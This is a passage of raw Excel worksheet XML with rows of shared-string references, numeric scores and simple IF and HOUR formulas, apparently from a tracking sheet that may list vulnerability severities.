      <c r="K268" s="4"/>
      <c r="L268" s="4">
        <f>IF(out!$G268="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M268" s="4"/>
      <c r="N268" s="4"/>
      <c r="O268" s="13"/>
      <c r="P268" s="4"/>
      <c r="Q268" s="13">
        <f>HOUR(out!$P268 -out!$N268)</f>
        <v>0</v>
      </c>
      <c r="R268" s="18"/>
      <c r="S268" s="4"/>
      <c r="T268" s="4"/>
      <c r="U268" s="4"/>
      <c r="V268" s="7"/>
    </row>
    <row r="269" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A269" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B269" s="4" t="s">
        <v>1688</v>
      </c>
      <c r="C269" s="4" t="s">
        <v>1689</v>
      </c>
      <c r="D269" s="4" t="s">
        <v>1690</v>
      </c>
      <c r="E269" s="4" t="s">
        <v>1691</v>
      </c>
      <c r="F269" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G269" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H269" s="4">
        <v>6.3</v>
      </c>
      <c r="I269" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J269" s="4"/>
      <c r="K269" s="4"/>
      <c r="L269" s="4">
        <f>IF(out!$G269="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M269" s="4"/>
      <c r="N269" s="4"/>
      <c r="O269" s="13"/>
      <c r="P269" s="4"/>
      <c r="Q269" s="13">
        <f>HOUR(out!$P269 -out!$N269)</f>
        <v>0</v>
      </c>
      <c r="R269" s="18"/>
      <c r="S269" s="4"/>
      <c r="T269" s="4"/>
      <c r="U269" s="4"/>
      <c r="V269" s="7"/>
    </row>
    <row r="270" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A270" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B270" s="4" t="s">
        <v>1692</v>
      </c>
      <c r="C270" s="4" t="s">
        <v>1693</v>
      </c>
      <c r="D270" s="4" t="s">
        <v>1694</v>
      </c>
      <c r="E270" s="4" t="s">
        <v>1695</v>
      </c>
      <c r="F270" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G270" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H270" s="4">
        <v>6.3</v>
      </c>
      <c r="I270" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J270" s="4"/>
      <c r="K270" s="4"/>
      <c r="L270" s="4">
        <f>IF(out!$G270="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M270" s="4"/>
      <c r="N270" s="4"/>
      <c r="O270" s="13"/>
      <c r="P270" s="4"/>
      <c r="Q270" s="13">
        <f>HOUR(out!$P270 -out!$N270)</f>
        <v>0</v>
      </c>
      <c r="R270" s="18"/>
      <c r="S270" s="4"/>
      <c r="T270" s="4"/>
      <c r="U270" s="4"/>
      <c r="V270" s="7"/>
    </row>
    <row r="271" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A271" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B271" s="4" t="s">
        <v>1696</v>
      </c>
      <c r="C271" s="4" t="s">
        <v>1697</v>
      </c>
      <c r="D271" s="4" t="s">
        <v>1698</v>
      </c>
      <c r="E271" s="4" t="s">
        <v>1699</v>
      </c>
      <c r="F271" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G271" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H271" s="4">
        <v>6.3</v>
      </c>
      <c r="I271" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J271" s="4"/>
      <c r="K271" s="4"/>
      <c r="L271" s="4">
        <f>IF(out!$G271="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M271" s="4"/>
      <c r="N271" s="4"/>
      <c r="O271" s="13"/>
      <c r="P271" s="4"/>
      <c r="Q271" s="13">
        <f>HOUR(out!$P271 -out!$N271)</f>
        <v>0</v>
      </c>
      <c r="R271" s="18"/>
      <c r="S271" s="4"/>
      <c r="T271" s="4"/>
      <c r="U271" s="4"/>
      <c r="V271" s="7"/>
    </row>
    <row r="272" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A272" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B272" s="4" t="s">
        <v>1700</v>
      </c>
      <c r="C272" s="4" t="s">
        <v>1701</v>
      </c>
      <c r="D272" s="4" t="s">
        <v>1702</v>
      </c>
      <c r="E272" s="4" t="s">
        <v>1703</v>
      </c>
      <c r="F272" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G272" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H272" s="4">
        <v>6.3</v>
      </c>
      <c r="I272" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J272" s="4"/>
      <c r="K272" s="4"/>
      <c r="L272" s="4">
        <f>IF(out!$G272="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M272" s="4"/>
      <c r="N272" s="4"/>
      <c r="O272" s="13"/>
      <c r="P272" s="4"/>
      <c r="Q272" s="13">
        <f>HOUR(out!$P272 -out!$N272)</f>
        <v>0</v>
      </c>
      <c r="R272" s="18"/>
      <c r="S272" s="4"/>
      <c r="T272" s="4"/>
      <c r="U272" s="4"/>
      <c r="V272" s="7"/>
    </row>
    <row r="273" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A273" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B273" s="4" t="s">
        <v>1704</v>
      </c>
      <c r="C273" s="4" t="s">
        <v>1705</v>
      </c>
      <c r="D273" s="4" t="s">
        <v>1706</v>
      </c>
      <c r="E273" s="4" t="s">
        <v>1707</v>
      </c>
      <c r="F273" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G273" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H273" s="4">
        <v>6.3</v>
      </c>
      <c r="I273" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J273" s="4"/>
      <c r="K273" s="4"/>
      <c r="L273" s="4">
        <f>IF(out!$G273="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M273" s="4"/>
      <c r="N273" s="4"/>
      <c r="O273" s="13"/>
      <c r="P273" s="4"/>
      <c r="Q273" s="13">
        <f>HOUR(out!$P273 -out!$N273)</f>
        <v>0</v>
      </c>
      <c r="R273" s="18"/>
      <c r="S273" s="4"/>
      <c r="T273" s="4"/>
      <c r="U273" s="4"/>
      <c r="V273" s="7"/>
    </row>
    <row r="274" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A274" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B274" s="4" t="s">
        <v>1708</v>
      </c>
      <c r="C274" s="4" t="s">
        <v>1709</v>
      </c>
      <c r="D274" s="4" t="s">
        <v>1710</v>
      </c>
      <c r="E274" s="4" t="s">
        <v>1711</v>
      </c>
      <c r="F274" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G274" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H274" s="4">
        <v>6.3</v>
      </c>
      <c r="I274" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J274" s="4"/>
      <c r="K274" s="4"/>
      <c r="L274" s="4">
        <f>IF(out!$G274="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M274" s="4"/>
      <c r="N274" s="4"/>
      <c r="O274" s="13"/>
      <c r="P274" s="4"/>
      <c r="Q274" s="13">
        <f>HOUR(out!$P274 -out!$N274)</f>
        <v>0</v>
      </c>
      <c r="R274" s="18"/>
      <c r="S274" s="4"/>
      <c r="T274" s="4"/>
      <c r="U274" s="4"/>
      <c r="V274" s="7"/>
    </row>
    <row r="275" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A275" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B275" s="4" t="s">
        <v>1712</v>
      </c>
      <c r="C275" s="4" t="s">
        <v>1713</v>
      </c>
      <c r="D275" s="4" t="s">
        <v>1714</v>
      </c>
      <c r="E275" s="4" t="s">
        <v>1715</v>
      </c>
      <c r="F275" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G275" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H275" s="4">
        <v>6.3</v>
      </c>
      <c r="I275" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J275" s="4"/>
      <c r="K275" s="4"/>
      <c r="L275" s="4">
        <f>IF(out!$G275="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M275" s="4"/>
      <c r="N275" s="4"/>
      <c r="O275" s="13"/>
      <c r="P275" s="4"/>
      <c r="Q275" s="13">
        <f>HOUR(out!$P275 -out!$N275)</f>
        <v>0</v>
      </c>
      <c r="R275" s="18"/>
      <c r="S275" s="4"/>
      <c r="T275" s="4"/>
      <c r="U275" s="4"/>
      <c r="V275" s="7"/>
    </row>
    <row r="276" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A276" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B276" s="4" t="s">
        <v>1716</v>
      </c>
      <c r="C276" s="4" t="s">
        <v>1717</v>
      </c>
      <c r="D276" s="4" t="s">
        <v>1718</v>
      </c>
      <c r="E276" s="4" t="s">
        <v>1719</v>
      </c>
      <c r="F276" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G276" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H276" s="4">
        <v>6.3</v>
      </c>
      <c r="I276" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J276" s="4"/>
      <c r="K276" s="4"/>
      <c r="L276" s="4">
        <f>IF(out!$G276="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M276" s="4"/>
      <c r="N276" s="4"/>
      <c r="O276" s="13"/>
      <c r="P276" s="4"/>
      <c r="Q276" s="13">
        <f>HOUR(out!$P276 -out!$N276)</f>
        <v>0</v>
      </c>
      <c r="R276" s="18"/>
      <c r="S276" s="4"/>
      <c r="T276" s="4"/>
      <c r="U276" s="4"/>
      <c r="V276" s="7"/>
    </row>
    <row r="277" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A277" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B277" s="4" t="s">
        <v>1720</v>
      </c>
      <c r="C277" s="4" t="s">
        <v>1721</v>
      </c>
      <c r="D277" s="4" t="s">
        <v>1722</v>
      </c>
      <c r="E277" s="4" t="s">
        <v>1723</v>
      </c>
      <c r="F277" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G277" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H277" s="4">
        <v>6.3</v>
      </c>
      <c r="I277" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J277" s="4"/>
      <c r="K277" s="4"/>
      <c r="L277" s="4">
        <f>IF(out!$G277="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M277" s="4"/>
      <c r="N277" s="4"/>
      <c r="O277" s="13"/>
      <c r="P277" s="4"/>
      <c r="Q277" s="13">
        <f>HOUR(out!$P277 -out!$N277)</f>
        <v>0</v>
      </c>
      <c r="R277" s="18"/>
      <c r="S277" s="4"/>
      <c r="T277" s="4"/>
      <c r="U277" s="4"/>
      <c r="V277" s="7"/>
    </row>
    <row r="278" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A278" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B278" s="4" t="s">
        <v>1724</v>
      </c>
      <c r="C278" s="4" t="s">
        <v>1725</v>
      </c>
      <c r="D278" s="4" t="s">
        <v>1726</v>
      </c>
      <c r="E278" s="4" t="s">
        <v>1727</v>
      </c>
      <c r="F278" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G278" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H278" s="4">
        <v>6.3</v>
      </c>
      <c r="I278" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J278" s="4"/>
      <c r="K278" s="4"/>
      <c r="L278" s="4">
        <f>IF(out!$G278="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M278" s="4"/>
      <c r="N278" s="4"/>
      <c r="O278" s="13"/>
      <c r="P278" s="4"/>
      <c r="Q278" s="13">
        <f>HOUR(out!$P278 -out!$N278)</f>
        <v>0</v>
      </c>
      <c r="R278" s="18"/>
      <c r="S278" s="4"/>
      <c r="T278" s="4"/>
      <c r="U278" s="4"/>
      <c r="V278" s="7"/>
    </row>
    <row r="279" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A279" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B279" s="4" t="s">
        <v>1728</v>
      </c>
      <c r="C279" s="4" t="s">
        <v>1729</v>
      </c>
      <c r="D279" s="4" t="s">
        <v>1730</v>
      </c>
      <c r="E279" s="4" t="s">
        <v>1731</v>
      </c>
      <c r="F279" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G279" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H279" s="4">
        <v>6.3</v>
      </c>
      <c r="I279" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J279" s="4"/>
      <c r="K279" s="4"/>
      <c r="L279" s="4">
        <f>IF(out!$G279="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M279" s="4"/>
      <c r="N279" s="4"/>
      <c r="O279" s="13"/>
      <c r="P279" s="4"/>
      <c r="Q279" s="13">
        <f>HOUR(out!$P279 -out!$N279)</f>
        <v>0</v>
      </c>
      <c r="R279" s="18"/>
      <c r="S279" s="4"/>
      <c r="T279" s="4"/>
      <c r="U279" s="4"/>
      <c r="V279" s="7"/>
    </row>
    <row r="280" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A280" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B280" s="4" t="s">
        <v>1732</v>
      </c>
      <c r="C280" s="4" t="s">
        <v>1733</v>
      </c>
      <c r="D280" s="4" t="s">
        <v>1734</v>
      </c>
      <c r="E280" s="4" t="s">
        <v>1735</v>
      </c>
      <c r="F280" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G280" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H280" s="4">
        <v>6.3</v>
      </c>
      <c r="I280" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J280" s="4"/>
      <c r="K280" s="4"/>
      <c r="L280" s="4">
        <f>IF(out!$G280="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M280" s="4"/>
      <c r="N280" s="4"/>
      <c r="O280" s="13"/>
      <c r="P280" s="4"/>
      <c r="Q280" s="13">
        <f>HOUR(out!$P280 -out!$N280)</f>
        <v>0</v>
      </c>
      <c r="R280" s="18"/>
      <c r="S280" s="4"/>
      <c r="T280" s="4"/>
      <c r="U280" s="4"/>
      <c r="V280" s="7"/>
    </row>
    <row r="281" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A281" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B281" s="4" t="s">
        <v>1736</v>
      </c>
      <c r="C281" s="4" t="s">
        <v>1737</v>
      </c>
      <c r="D281" s="4" t="s">
        <v>1738</v>
      </c>
      <c r="E281" s="4" t="s">
        <v>1739</v>
      </c>
      <c r="F281" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G281" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H281" s="4">
        <v>6.3</v>
      </c>
      <c r="I281" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J281" s="4"/>
      <c r="K281" s="4"/>
      <c r="L281" s="4">
        <f>IF(out!$G281="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M281" s="4"/>
      <c r="N281" s="4"/>
      <c r="O281" s="13"/>
      <c r="P281" s="4"/>
      <c r="Q281" s="13">
        <f>HOUR(out!$P281 -out!$N281)</f>
        <v>0</v>
      </c>
      <c r="R281" s="18"/>
      <c r="S281" s="4"/>
      <c r="T281" s="4"/>
      <c r="U281" s="4"/>
      <c r="V281" s="7"/>
    </row>
    <row r="282" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A282" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B282" s="4" t="s">
        <v>1740</v>
      </c>
      <c r="C282" s="4" t="s">
        <v>1741</v>
      </c>
      <c r="D282" s="4" t="s">
        <v>1742</v>
      </c>
      <c r="E282" s="4" t="s">
        <v>1743</v>
      </c>
      <c r="F282" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G282" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H282" s="4">
        <v>6.3</v>
      </c>
      <c r="I282" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J282" s="4"/>
      <c r="K282" s="4"/>
      <c r="L282" s="4">
        <f>IF(out!$G282="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M282" s="4"/>
      <c r="N282" s="4"/>
      <c r="O282" s="13"/>
      <c r="P282" s="4"/>
      <c r="Q282" s="13">
        <f>HOUR(out!$P282 -out!$N282)</f>
        <v>0</v>
      </c>
      <c r="R282" s="18"/>
      <c r="S282" s="4"/>
      <c r="T282" s="4"/>
      <c r="U282" s="4"/>
      <c r="V282" s="7"/>
    </row>
    <row r="283" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A283" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B283" s="4" t="s">
        <v>1744</v>
      </c>
      <c r="C283" s="4" t="s">
        <v>1745</v>
      </c>
      <c r="D283" s="4" t="s">
        <v>1746</v>
      </c>
      <c r="E283" s="4" t="s">
        <v>1747</v>
      </c>
      <c r="F283" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G283" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H283" s="4">
        <v>6.3</v>
      </c>
      <c r="I283" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J283" s="4"/>
      <c r="K283" s="4"/>
      <c r="L283" s="4">
        <f>IF(out!$G283="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M283" s="4"/>
      <c r="N283" s="4"/>
      <c r="O283" s="13"/>
      <c r="P283" s="4"/>
      <c r="Q283" s="13">
        <f>HOUR(out!$P283 -out!$N283)</f>
        <v>0</v>
      </c>
      <c r="R283" s="18"/>
      <c r="S283" s="4"/>
      <c r="T283" s="4"/>
      <c r="U283" s="4"/>
      <c r="V283" s="7"/>
    </row>
    <row r="284" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A284" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B284" s="4" t="s">
        <v>1748</v>
      </c>
      <c r="C284" s="4" t="s">
        <v>1749</v>
      </c>
      <c r="D284" s="4" t="s">
        <v>1750</v>
      </c>
      <c r="E284" s="4" t="s">
        <v>1751</v>
      </c>
      <c r="F284" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G284" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H284" s="4">
        <v>6.3</v>
      </c>
      <c r="I284" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J284" s="4"/>
      <c r="K284" s="4"/>
      <c r="L284" s="4">
        <f>IF(out!$G284="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M284" s="4"/>
      <c r="N284" s="4"/>
      <c r="O284" s="13"/>
      <c r="P284" s="4"/>
      <c r="Q284" s="13">
        <f>HOUR(out!$P284 -out!$N284)</f>
        <v>0</v>
      </c>
      <c r="R284" s="18"/>
      <c r="S284" s="4"/>
      <c r="T284" s="4"/>
      <c r="U284" s="4"/>
      <c r="V284" s="7"/>
    </row>
    <row r="285" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A285" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B285" s="4" t="s">
        <v>1752</v>
      </c>
      <c r="C285" s="4" t="s">
        <v>1753</v>
      </c>
      <c r="D285" s="4" t="s">
        <v>1754</v>
      </c>
      <c r="E285" s="4" t="s">
        <v>1755</v>
      </c>
      <c r="F285" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G285" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H285" s="4">
        <v>6.3</v>
      </c>
      <c r="I285" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J285" s="4"/>
      <c r="K285" s="4"/>
      <c r="L285" s="4">
        <f>IF(out!$G285="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M285" s="4"/>
      <c r="N285" s="4"/>
      <c r="O285" s="13"/>
      <c r="P285" s="4"/>
      <c r="Q285" s="13">
        <f>HOUR(out!$P285 -out!$N285)</f>
        <v>0</v>
      </c>
      <c r="R285" s="18"/>
      <c r="S285" s="4"/>
      <c r="T285" s="4"/>
      <c r="U285" s="4"/>
      <c r="V285" s="7"/>
    </row>
    <row r="286" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A286" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B286" s="4" t="s">
        <v>1756</v>
      </c>
      <c r="C286" s="4" t="s">
        <v>1757</v>
      </c>
      <c r="D286" s="4" t="s">
        <v>1758</v>
      </c>
      <c r="E286" s="4" t="s">
        <v>1759</v>
      </c>
      <c r="F286" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G286" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H286" s="4">
        <v>6.3</v>
      </c>
      <c r="I286" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J286" s="4"/>
      <c r="K286" s="4"/>
      <c r="L286" s="4">
        <f>IF(out!$G286="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M286" s="4"/>
      <c r="N286" s="4"/>
      <c r="O286" s="13"/>
      <c r="P286" s="4"/>
      <c r="Q286" s="13">
        <f>HOUR(out!$P286 -out!$N286)</f>
        <v>0</v>
      </c>
      <c r="R286" s="18"/>
      <c r="S286" s="4"/>
      <c r="T286" s="4"/>
      <c r="U286" s="4"/>
      <c r="V286" s="7"/>
    </row>
    <row r="287" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A287" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B287" s="4" t="s">
        <v>1760</v>
      </c>
      <c r="C287" s="4" t="s">
        <v>1761</v>
      </c>
      <c r="D287" s="4" t="s">
        <v>1762</v>
      </c>
      <c r="E287" s="4" t="s">
        <v>1763</v>
      </c>
      <c r="F287" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G287" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H287" s="4">
        <v>6.3</v>
      </c>
      <c r="I287" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J287" s="4"/>
      <c r="K287" s="4"/>
      <c r="L287" s="4">
        <f>IF(out!$G287="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M287" s="4"/>
      <c r="N287" s="4"/>
      <c r="O287" s="13"/>
      <c r="P287" s="4"/>
      <c r="Q287" s="13">
        <f>HOUR(out!$P287 -out!$N287)</f>
        <v>0</v>
      </c>
      <c r="R287" s="18"/>
      <c r="S287" s="4"/>
      <c r="T287" s="4"/>
      <c r="U287" s="4"/>
      <c r="V287" s="7"/>
    </row>
    <row r="288" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A288" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B288" s="4" t="s">
        <v>1764</v>
      </c>
      <c r="C288" s="4" t="s">
        <v>1765</v>
      </c>
      <c r="D288" s="4" t="s">
        <v>1766</v>
      </c>
      <c r="E288" s="4" t="s">
        <v>1767</v>
      </c>
      <c r="F288" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G288" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H288" s="4">
        <v>6.3</v>
      </c>
      <c r="I288" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J288" s="4"/>
      <c r="K288" s="4"/>
      <c r="L288" s="4">
        <f>IF(out!$G288="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M288" s="4"/>
      <c r="N288" s="4"/>
      <c r="O288" s="13"/>
      <c r="P288" s="4"/>
      <c r="Q288" s="13">
        <f>HOUR(out!$P288 -out!$N288)</f>
        <v>0</v>
      </c>
      <c r="R288" s="18"/>
      <c r="S288" s="4"/>
      <c r="T288" s="4"/>
      <c r="U288" s="4"/>
      <c r="V288" s="7"/>
    </row>
    <row r="289" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A289" s="3" t="s">
        <v>1768</v>
      </c>
      <c r="B289" s="4" t="s">
        <v>1769</v>
      </c>
      <c r="C289" s="4" t="s">
        <v>1770</v>
      </c>
      <c r="D289" s="4" t="s">
        <v>1771</v>
      </c>
      <c r="E289" s="4" t="s">
        <v>1772</v>
      </c>
      <c r="F289" s="4" t="s">
        <v>1773</v>
      </c>
      <c r="G289" s="4" t="s">
        <v>1774</v>
      </c>
      <c r="H289" s="4">
        <v>5.8</v>
      </c>
      <c r="I289" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J289" s="4"/>
      <c r="K289" s="4"/>
      <c r="L289" s="4">
        <f>IF(out!$G289="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M289" s="4"/>
      <c r="N289" s="4"/>
      <c r="O289" s="13"/>
      <c r="P289" s="4"/>
      <c r="Q289" s="13">
        <f>HOUR(out!$P289 -out!$N289)</f>
        <v>0</v>
      </c>
      <c r="R289" s="18"/>
      <c r="S289" s="4"/>
      <c r="T289" s="4"/>
      <c r="U289" s="4"/>
      <c r="V289" s="7"/>
    </row>
    <row r="290" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A290" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B290" s="4" t="s">
        <v>1775</v>
      </c>
      <c r="C290" s="4" t="s">
        <v>1776</v>
      </c>
      <c r="D290" s="4" t="s">
        <v>1777</v>
      </c>
      <c r="E290" s="4" t="s">
        <v>1778</v>
      </c>
      <c r="F290" s="4" t="s">
        <v>1779</v>
      </c>
      <c r="G290" s="4" t="s">
        <v>1780</v>
      </c>
      <c r="H290" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I290" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J290" s="4"/>
      <c r="K290" s="4"/>
      <c r="L290" s="4">
        <f>IF(out!$G290="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M290" s="4"/>
      <c r="N290" s="4"/>
      <c r="O290" s="13"/>
      <c r="P290" s="4"/>
      <c r="Q290" s="13">
        <f>HOUR(out!$P290 -out!$N290)</f>
        <v>0</v>
      </c>
      <c r="R290" s="18"/>
      <c r="S290" s="4"/>
      <c r="T290" s="4"/>
      <c r="U290" s="4"/>
      <c r="V290" s="7"/>
    </row>
    <row r="291" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A291" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B291" s="4" t="s">
        <v>1782</v>
      </c>
      <c r="C291" s="4" t="s">
        <v>1783</v>
      </c>
      <c r="D291" s="4" t="s">
        <v>1784</v>
      </c>
      <c r="E291" s="4" t="s">
        <v>1785</v>
      </c>
      <c r="F291" s="4" t="s">
        <v>1786</v>
      </c>
      <c r="G291" s="4" t="s">
        <v>1787</v>
      </c>
      <c r="H291" s="4">
        <v>7.1</v>
      </c>
      <c r="I291" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J291" s="4"/>
      <c r="K291" s="4"/>
      <c r="L291" s="4">
        <f>IF(out!$G291="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M291" s="4"/>
      <c r="N291" s="4"/>
      <c r="O291" s="13"/>
      <c r="P291" s="4"/>
      <c r="Q291" s="13">
        <f>HOUR(out!$P291 -out!$N291)</f>
        <v>0</v>
      </c>
      <c r="R291" s="18"/>
      <c r="S291" s="4"/>
      <c r="T291" s="4"/>
      <c r="U291" s="4"/>
      <c r="V291" s="7"/>
    </row>
    <row r="292" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A292" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B292" s="4" t="s">
        <v>1788</v>
      </c>
      <c r="C292" s="4" t="s">
        <v>1789</v>
      </c>
      <c r="D292" s="4" t="s">
        <v>1790</v>
      </c>
      <c r="E292" s="4" t="s">
        <v>1791</v>
      </c>
      <c r="F292" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G292" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H292" s="4">
        <v>7.1</v>
      </c>
      <c r="I292" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J292" s="4"/>
      <c r="K292" s="4"/>
      <c r="L292" s="4">
        <f>IF(out!$G292="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M292" s="4"/>
      <c r="N292" s="4"/>
      <c r="O292" s="13"/>
      <c r="P292" s="4"/>
      <c r="Q292" s="13">
        <f>HOUR(out!$P292 -out!$N292)</f>
        <v>0</v>
      </c>
      <c r="R292" s="18"/>
      <c r="S292" s="4"/>
      <c r="T292" s="4"/>
      <c r="U292" s="4"/>
      <c r="V292" s="7"/>
    </row>
    <row r="293" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A293" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B293" s="4" t="s">
        <v>1792</v>
      </c>
      <c r="C293" s="4" t="s">
        <v>1793</v>
      </c>
      <c r="D293" s="4" t="s">
        <v>1794</v>
      </c>
      <c r="E293" s="4" t="s">
        <v>1795</v>
      </c>
      <c r="F293" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G293" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H293" s="4">
        <v>7.5</v>
      </c>
      <c r="I293" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J293" s="4"/>
      <c r="K293" s="4"/>
      <c r="L293" s="4">
